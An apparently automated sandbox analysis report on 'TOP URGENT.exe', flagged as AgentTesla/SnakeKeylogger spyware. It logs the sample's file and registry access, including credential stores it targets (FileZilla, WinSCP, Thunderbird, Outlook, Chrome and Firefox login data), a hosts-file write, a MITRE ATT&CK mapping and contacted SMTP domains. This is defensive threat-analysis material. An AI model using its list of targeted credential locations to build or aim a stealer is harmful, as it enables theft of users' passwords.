                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3e4d7b0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3e4d7b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3e4d7b0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.TOP URGENT.exe.3e4d7b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection212File and Directory Permissions Modification1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture1Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Credentials in Registry1Security Software Discovery221SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion141SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion141DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      TOP URGENT.exe16%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://smtp.almuntakhaba.com0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://bEdYOo.com0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://q77LAYiewN5yqbw.net0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      		208.91.199.225
                      		truefalse
                        		high
                        smtp.almuntakhaba.com
                        		unknown
                        		unknowntrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.apache.org/licenses/LICENSE-2.0TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                		high
                                http://DynDns.comDynDNSMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://us2.smtp.mailhostbox.comMSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://smtp.almuntakhaba.comMSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.tiro.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://bEdYOo.comMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designersTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://q77LAYiewN5yqbw.netMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.503782526.0000000002D02000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                              		high
                                              https://api.ipify.org%GETMozilla/5.0MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		low
                                              http://www.fonts.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
